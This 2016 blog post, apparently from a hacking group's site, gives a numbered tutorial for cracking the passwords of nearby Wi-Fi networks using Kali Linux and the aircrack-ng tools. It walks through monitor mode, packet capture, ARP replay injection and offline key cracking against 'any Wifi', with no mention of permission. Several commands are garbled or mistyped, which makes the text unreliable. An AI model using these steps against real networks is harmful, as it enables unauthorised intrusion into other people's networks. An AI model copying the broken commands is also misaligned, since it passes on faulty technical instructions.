Saturday 23 April 2016

Using Kali LinuX How to Hack Wifi with Android

HOW TO INSTALL KALI LINUX ?

FULL TUTORIAL CLICK HERE

After installation  how to hack wifi ....

NOW START CRACKING PASSWORD :-
1. Open Terminal in Kali Linux
2. airmon-ng (This Command will Show
Your Driver Name, In Mine Case Its Mono)
3. Airmon-ng Stop mono (This Command
Can Show you Some Processes that Could
Cause Trouble, So You Just Need to Kill
them)
4. [If In Above Process You Find Three
Processes.... So Just Write Three Times
This Command] Kill PID NO.
5. Airodump-ng Mono [Now it Will Show All
Your Wifi with their BSSID, ESSID, which is
the name of Access Points and Security
they are having]
NOTE - Larger the PWR no. of WIFI
You Choose... More Reliable Chance
of Cracking Its Password
6. Now Select any Wifi and Write this
Command :-
"airodump-ng -c CHANNEL_NO. -w
bell -bssid BSSID_NO. mono" (After
this Command... Calculations of
Beacons & Data will Start... for
Cracking a Wifi Password You Need
a Huge Amount of Data)
7. Open New Terminal and Write :
"aireplay-ng Channel_no. o -a
bssid_of_accesspoint mono (here we are
mainly Doing Handshaking and Association)
8. aireplay-ng -3 -
bbssid_of_accesspoint mono [Here we have
written -3 for aireplay attack]
9. After this You will See many ARP
Requests going on and Your Data will Start
raising at a Very high Speed which is very
necessary for Cracking WIFI's Password....
many Acknowledgement and APR Request will
be Displayed... But Stay Relaxed :)
10. Open Another Terminal and Type: ls
(It will Show You Two Files... in .cap File all
the Data will be saved, So we will do this File
too Crack the password).
11. aircrack-ng name_of_.cap_file.
12. In My Case, Its --- Bell-01.cap
13. Just Holds Your Hands as it will
itself try Many keys for Cracking Password
and After Some Times it Will Test all the Keys
and Displayed Prompt Msg as Key Found...!
Decrypted Successfully..

Stay tuned with  KingHackzz Team

No comments:

Post a Comment